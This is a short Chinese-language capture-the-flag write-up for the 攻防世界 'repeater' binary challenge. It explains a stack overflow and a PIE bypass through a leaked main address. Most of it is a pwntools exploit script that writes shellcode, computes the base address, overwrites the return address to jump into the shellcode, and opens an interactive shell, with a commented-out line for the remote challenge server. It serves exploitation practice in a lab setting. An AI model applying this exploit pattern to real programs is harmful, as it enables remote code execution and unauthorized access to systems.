攻防世界–repeater

分析文件

存在栈溢出漏洞,并且只能刚好溢出到返回地址,所以基本上ROP就是不能用的了,其他师傅给的wp是通过将shellcode写到bss段里面去,然后返回到bss段执行,但是在本地gdb的话发现是bss段是没有执行权限的.

利用程序

由分析文件来看的话,就栈溢出就行了,

但是文件开启了PIE,于是我们得绕过,但是文件给了绕过的方法,基本上比较简单.主要是练习练习exp脚本的编写.

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
context.log_level = True
context.arch = 'amd64'
io = process('./repeater')
#io = remote("61.147.171.105","57019")

shellcode = asm(shellcraft.sh())
io.sendlineafter("Please give me your name :", shellcode)

payload = b'A'*0x20 + p64(0x321321)  # 0x321321:3281697
io.sendlineafter("input :", payload)

io.readuntil('But there is gift for you :\n')
main_addr = int(io.recvuntil("\n"),16)
# or main_addr = int(io.readline()[:-1],16)
base_addr = main_addr - 0xa33
log.info("base_addr: "+ hex(base_addr))

payload = b'A'*0x20 + p64(0) + p64(0xdeadbeef) + p64(0xdeadbeef) + p64(base_addr + 0x202040)
io.sendlineafter("input :", payload)
io.interactive()